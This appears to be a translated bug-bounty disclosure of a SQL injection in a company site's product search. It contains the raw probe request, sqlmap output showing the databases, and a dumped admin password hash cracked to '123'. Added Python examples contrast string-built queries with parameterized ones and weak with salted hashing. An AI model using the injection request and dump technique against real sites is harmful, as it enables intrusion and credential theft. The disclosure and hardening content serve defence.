2015-12-17: Details reported to the vendor and awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in the relevant field
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
No login page was found.
The search function has a SQL injection in a POST parameter:
POST request:
POST /site/keyword_search/Search-product_c/index.php?Company_SN=21779&PHPSESSID=o08t64euchcjt83i8u3go40td5 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/site/left/asn_left_8jimmy86/index.php?Company_SN=21779&PHPSESSID=oshynibfulnshuccmzydjfnfubjjxqrl&&target=MainPage
Cookie: PHPSESSID=o08t64euchcjt83i8u3go40td5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Company_SN=21779&KeyWord=1%27
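The `KeyWord=1%27` probe above (a single quote) works because the parameter is spliced into SQL text. The following added example, written for this report and not taken from the vendor's code, contrasts that pattern with a parameterized query against a constructed in-memory SQLite stand-in; the `Product` schema and row data are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the product search table (schema is assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Product (Company_SN INTEGER, Name TEXT)")
    con.executemany(
        "INSERT INTO Product VALUES (?, ?)",
        [(21779, "cable 1"), (21779, "connector"), (99, "other vendor part")],
    )
    return con


def search_vulnerable(con, company_sn, keyword):
    # The pattern the report implies: request values concatenated into SQL.
    # A lone quote in `keyword` unbalances the string literal, so the
    # database itself sees and parses the attacker-controlled text.
    sql = (
        "SELECT Name FROM Product WHERE Company_SN = " + str(int(company_sn))
        + " AND Name LIKE '%" + keyword + "%'"
    )
    return [row[0] for row in con.execute(sql)]


def search_safe(con, company_sn, keyword):
    # Hardened form: bound parameters. The keyword is only ever a value,
    # so a quote is matched literally instead of changing the statement.
    sql = "SELECT Name FROM Product WHERE Company_SN = ? AND Name LIKE ?"
    return [row[0] for row in con.execute(sql, (company_sn, "%" + keyword + "%"))]


def probe(con, search_fn, keyword):
    """Run one search and report ('ok', rows) or ('error', message)."""
    try:
        return ("ok", search_fn(con, 21779, keyword))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_safe):
        print(fn.__name__, "cable ->", probe(db, fn, "cable"))
        print(fn.__name__, "1' ->", probe(db, fn, "1'"))
```

The vulnerable variant answers the quote probe with a database syntax error, which is exactly the signal sqlmap keys on; the parameterized variant simply returns no rows.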
available databases [4]:
[*] information_schema
[*] muchcalm
[*] twinner
[*] twinner_dev

[21:24:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.3.16
back-end DBMS: MySQL 5.0
[21:24:40] [INFO] fetching current user
[21:24:40] [INFO] resumed: twinner@localhost
current user: 'twinner@localhost'
[279 tables]
[1 entry]
+-------+----+----------------------------------------+
| adm   | id | passwd                                 |
+-------+----+----------------------------------------+
| admin | 1  | 202cb962ac59075b964b07152d234b70 (123) |
+-------+----+----------------------------------------+
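The dumped `passwd` column is an unsalted MD5 that sqlmap resolved instantly to `123`. This added example (not the vendor's code) confirms that the recovered digest is plain MD5 of that value and shows the salted, iterated form such a column should hold instead; the `pbkdf2_sha256$...` storage format is an assumption chosen for this illustration.

```python
import hashlib
import hmac
import os

# Digest taken from the report's dump; sqlmap annotated it as MD5("123").
DUMPED_HASH = "202cb962ac59075b964b07152d234b70"


def is_unsalted_md5_of(candidate, digest_hex):
    """True if digest_hex is bare MD5 of candidate: no salt, no stretching."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest_hex.lower()


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; format 'pbkdf2_sha256$iters$salt$dk' is assumed."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("dump is unsalted MD5 of '123':", is_unsalted_md5_of("123", DUMPED_HASH))
    stored = hash_password("123")
    print("stored:", stored)
    print("verify '123':", verify_password("123", stored))
</test>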
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-12-21 04:01
Thanks for the report
None yet